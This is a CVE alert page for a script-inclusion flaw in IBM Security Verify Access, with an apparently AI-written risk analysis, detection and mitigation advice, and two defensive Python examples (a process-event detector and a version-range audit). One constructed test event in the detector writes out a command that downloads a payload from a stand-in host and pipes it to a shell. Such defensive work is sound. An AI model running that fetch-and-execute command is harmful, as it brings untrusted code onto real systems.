CVE Alert: CVE-2025-36355 – IBM – Security Verify Access Appliance

CVE-2025-36355

HIGH · No exploitation known

IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 could allow a locally authenticated user to execute malicious scripts from outside of its control sphere.

CVSS v3.1 (8.5)
AV LOCAL · AC LOW · PR NONE · UI NONE · S CHANGED
Vendor
IBM
Product
Security Verify Access Appliance, Security Verify Access Docker
Versions
Security Verify Access Appliance: 10.0.0.0 through 10.0.9.0 IF2 (inclusive); 11.0.0.0 through 11.0.1.0 (inclusive)
Security Verify Access Docker: 10.0.0.0 through 10.0.9.0 IF2 (inclusive); 11.0.0.0 through 11.0.1.0 (inclusive)
CWE
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
Published
2025-10-06T16:52:30.705Z
Updated
2025-10-06T19:59:35.611Z
CPE
cpe:2.3:a:ibm:security_verify_access:10.0.0.0:*:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interm_fix2:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access:11.0.0.0:*:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access:11.0.1.0:*:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access_docker:10.0.0.0:*:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interm_fix2:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access_docker:11.0.0.0:*:*:*:*:*:*:*
cpe:2.3:a:ibm:security_verify_access_docker:11.0.1.0:*:*:*:*:*:*:*

AI Summary Analysis

Risk verdict

High (CVSS 3.1 base 8.5): a user with local access to the appliance or container can make the product run scripts it does not control. No exploitation was known at publication, but the changed scope and high confidentiality impact justify prompt remediation.

Why this matters

If exploited, an attacker runs code of their choosing inside the affected IBM Security Verify Access component, with full read access to whatever it holds (C:H) and a limited ability to tamper with or disrupt it (I:L, A:L). Scope changed (S:C) means the consequences are not confined to the vulnerable component itself, so the blast radius in an enterprise deployment is larger than the local attack vector alone suggests.

Most likely attack path

  • Preconditions: local access to the appliance or container host; no user interaction is required. Note that IBM's description says "locally authenticated user" while the published vector encodes PR:N (no privileges required), so the two disagree on how much access is needed; plan on the weaker requirement until the vendor clarifies.
  • Attacker objective: cause the component to load and execute a script from a location outside its control sphere (CWE-829), thereby inheriting the component's access to data and processes on the host.
  • Lateral movement potential: the foothold is local, but the changed scope indicates that impact can extend beyond the vulnerable component, for example to other services on the same host, the container host, or connected systems.

Who is most exposed

On-premises appliances and Docker deployments of IBM Security Verify Access in which local access is not tightly held: shared container hosts, appliances with more local accounts than the core administrators, and environments where management interfaces are reachable from broad internal networks or VPN segments rather than a dedicated admin network.

Detection ideas

  • Script interpreters (sh, bash, python, perl and similar) spawned by the Verify Access processes with a script path outside the product's own directories, or with an inline command (-c).
  • New or modified script files in the application directories, detected by file-integrity monitoring against a post-deployment baseline.
  • Local logins by non-administrative accounts outside normal maintenance windows, or unusual login patterns to the management interfaces.
  • Anomalous process trees under the Verify Access component: outbound download tools, unexpected child processes, or processes running as the service account that the product never starts in normal operation.
  • Privilege-escalation or script-execution alerts from EDR or host auditing that are tied to the Verify Access hosts or containers.
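The first and fourth detection ideas above can be expressed as a small rule over process-start telemetry. The following is an added example, not code from this page or from IBM: it assumes an EDR-style JSON-lines export of process events (not IBM's own log format), and the parent image name and trusted script directory are hypothetical placeholders you would replace with the real values for your deployment. It flags an interpreter launched by the monitored component when the script lies outside the trusted directory or when the code is passed inline, which is the "outside of its control sphere" pattern of CWE-829.

```python
"""Added example: flag interpreters launched by a monitored component with a
script (or inline command) that lies outside the component's own script
directory. Event shape, parent image and directory names are assumptions."""
import json
import os
import shlex

# Hypothetical parent image(s) of the component under watch (placeholder).
MONITORED_PARENTS = {"/opt/vendor/runtime/server"}
# Hypothetical directory holding the component's own, vendor-shipped scripts.
TRUSTED_SCRIPT_DIRS = ("/opt/vendor/runtime/scripts",)
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl", "ruby"}

# Constructed sample events (not real telemetry), one JSON object per line.
SAMPLE_EVENTS = """\
{"ts":"2025-10-07T01:02:03Z","host":"isva-1","parent":"/opt/vendor/runtime/server","image":"/bin/sh","cmdline":"/bin/sh /opt/vendor/runtime/scripts/rotate.sh","user":"svc"}
{"ts":"2025-10-07T01:02:09Z","host":"isva-1","parent":"/opt/vendor/runtime/server","image":"/usr/bin/python3","cmdline":"/usr/bin/python3 /tmp/helper.py","user":"svc"}
{"ts":"2025-10-07T01:02:15Z","host":"isva-1","parent":"/opt/vendor/runtime/server","image":"/bin/bash","cmdline":"/bin/bash -c 'curl -s http://198.51.100.7/x | sh'","user":"svc"}
{"ts":"2025-10-07T01:03:00Z","host":"isva-1","parent":"/usr/sbin/sshd","image":"/bin/bash","cmdline":"/bin/bash -l","user":"admin"}
"""


def _script_argument(cmdline):
    """Return ("inline", None) for -c/-e one-liners, ("script", path) for a
    script file, or (None, None) for an interactive interpreter start."""
    argv = shlex.split(cmdline)
    for arg in argv[1:]:
        if arg in ("-c", "-e"):       # inline code: there is no file to vet
            return "inline", None
        if not arg.startswith("-"):   # first non-option argument is the script
            return "script", arg
    return None, None


def _under_trusted_dir(path):
    # normpath collapses "../" so a path that escapes the directory is caught.
    real = os.path.normpath(path)
    return any(real == d or real.startswith(d + os.sep) for d in TRUSTED_SCRIPT_DIRS)


def analyse_event(event):
    """Return a finding dict for a suspicious interpreter launch, else None."""
    if event.get("parent") not in MONITORED_PARENTS:
        return None
    if os.path.basename(event.get("image", "")) not in INTERPRETERS:
        return None
    kind, script = _script_argument(event.get("cmdline", ""))
    if kind == "inline":
        reason = "inline command passed to interpreter"
    elif kind == "script" and not _under_trusted_dir(script):
        reason = "script outside trusted directory: " + script
    else:
        return None
    return {"ts": event["ts"], "host": event["host"], "user": event.get("user"),
            "cmdline": event["cmdline"], "reason": reason}


def scan(lines):
    """Run analyse_event over JSON-lines text; returns the list of findings."""
    findings = []
    for line in lines.splitlines():
        if line.strip():
            finding = analyse_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["ts"], f["host"], f["user"], f["reason"], "|", f["cmdline"])
```

Of the four constructed events, only the second (a script under /tmp) and the third (an inline download-and-run command) are flagged; the vendor script under the trusted directory and the administrator's SSH shell are not. Relative paths and "../" sequences are normalised before the directory check so that a script that escapes the trusted directory is still caught.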

Mitigation and prioritisation

  • Upgrade to the fixed builds named in the IBM advisory for both the appliance and the Docker images; verify from inventory that every instance in the ranges above (including 10.0.9.0 IF2) has been covered.
  • Enforce strict local-access controls: restrict management interfaces to trusted admin networks, remove or disable unnecessary local accounts, and require MFA for the accounts that remain.
  • Where the platform allows it, apply application allowlisting and restrict which interpreters and script locations the affected components may use.
  • Forward host and container logs off-box and enable EDR coverage for the Verify Access processes; alert on the script and process patterns listed under detection ideas.
  • Patch in a controlled change window with backups and a rollback path. If patching must wait, apply the compensating controls above and isolate the affected systems from users who do not administer them.
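The "verify coverage across all appliances and Docker images" step needs a reliable way to decide whether a given build is inside the affected ranges, which is awkward because IBM's version strings carry an interim-fix suffix ("10.0.9.0 IF2") that plain numeric comparison ignores. The following added example (not code from this page or from IBM) parses a version either from that form or from one of the CPE 2.3 strings listed above, where the interim fix appears as the update field "interm_fix2", and checks it against the inclusive ranges the advisory states. The inventory rows are constructed and the host names are hypothetical; the code does not know which builds are fixed, only which ones the page lists as affected.

```python
"""Added example: check inventory entries against the affected ranges this
advisory lists. Inventory rows and host names are constructed placeholders."""
import re

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)(?:\s*IF(\d+))?$", re.IGNORECASE)
_IF_RE = re.compile(r"^interm_fix(\d+)$", re.IGNORECASE)

# Inclusive affected ranges from the advisory; the 5th element is the IF level
# (0 = base build without an interim fix).
AFFECTED_RANGES = {
    "security_verify_access": [((10, 0, 0, 0, 0), (10, 0, 9, 0, 2)),
                               ((11, 0, 0, 0, 0), (11, 0, 1, 0, 0))],
    "security_verify_access_docker": [((10, 0, 0, 0, 0), (10, 0, 9, 0, 2)),
                                      ((11, 0, 0, 0, 0), (11, 0, 1, 0, 0))],
}


def parse_version(text):
    """'10.0.9.0 IF2' -> (10, 0, 9, 0, 2); a missing IF suffix counts as level 0."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised version: %r" % text)
    a, b, c, d, iflevel = m.groups()
    return (int(a), int(b), int(c), int(d), int(iflevel or 0))


def parse_cpe(cpe):
    """Return (product, version tuple) from a CPE 2.3 formatted string.
    Field order is cpe:2.3:part:vendor:product:version:update:... and the
    interim fix is carried in the update field as 'interm_fixN'."""
    fields = cpe.split(":")
    if len(fields) < 7 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError("not a CPE 2.3 string: %r" % cpe)
    product, version, update = fields[4], fields[5], fields[6]
    m = _IF_RE.match(update)
    iflevel = int(m.group(1)) if m else 0
    return product, parse_version(version)[:4] + (iflevel,)


def is_affected(product, version):
    """True when the version tuple lies inside any listed range for the product."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES.get(product, []))


def audit(inventory):
    """inventory: iterable of (host, product, version string or CPE string).
    Returns a list of (host, product, version tuple, affected)."""
    out = []
    for host, product, ident in inventory:
        if ident.startswith("cpe:"):
            product, version = parse_cpe(ident)
        else:
            version = parse_version(ident)
        out.append((host, product, version, is_affected(product, version)))
    return out


# Constructed inventory (hypothetical hosts) mixing plain versions and CPEs.
SAMPLE_INVENTORY = [
    ("isva-prod-1", "security_verify_access", "10.0.9.0 IF2"),
    ("isva-prod-2", "security_verify_access", "11.0.1.0"),
    ("isva-lab-1", "security_verify_access", "11.0.1.0 IF1"),
    ("k8s-node-3", "security_verify_access_docker",
     "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interm_fix2:*:*:*:*:*:*"),
]

if __name__ == "__main__":
    for host, product, version, affected in audit(SAMPLE_INVENTORY):
        print(host, product, ".".join(map(str, version[:4])), "IF%d" % version[4],
              "AFFECTED" if affected else "outside listed range")
```

One caveat the check makes visible: the 11.x range is stated as ending at 11.0.1.0 with no interim-fix suffix, so the code orders "11.0.1.0 IF1" after the upper bound and reports it as outside the listed range. That is the literal reading of the advisory, not a statement that IF1 is fixed; confirm the fixed build against IBM's advisory before treating any build outside the range as safe.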
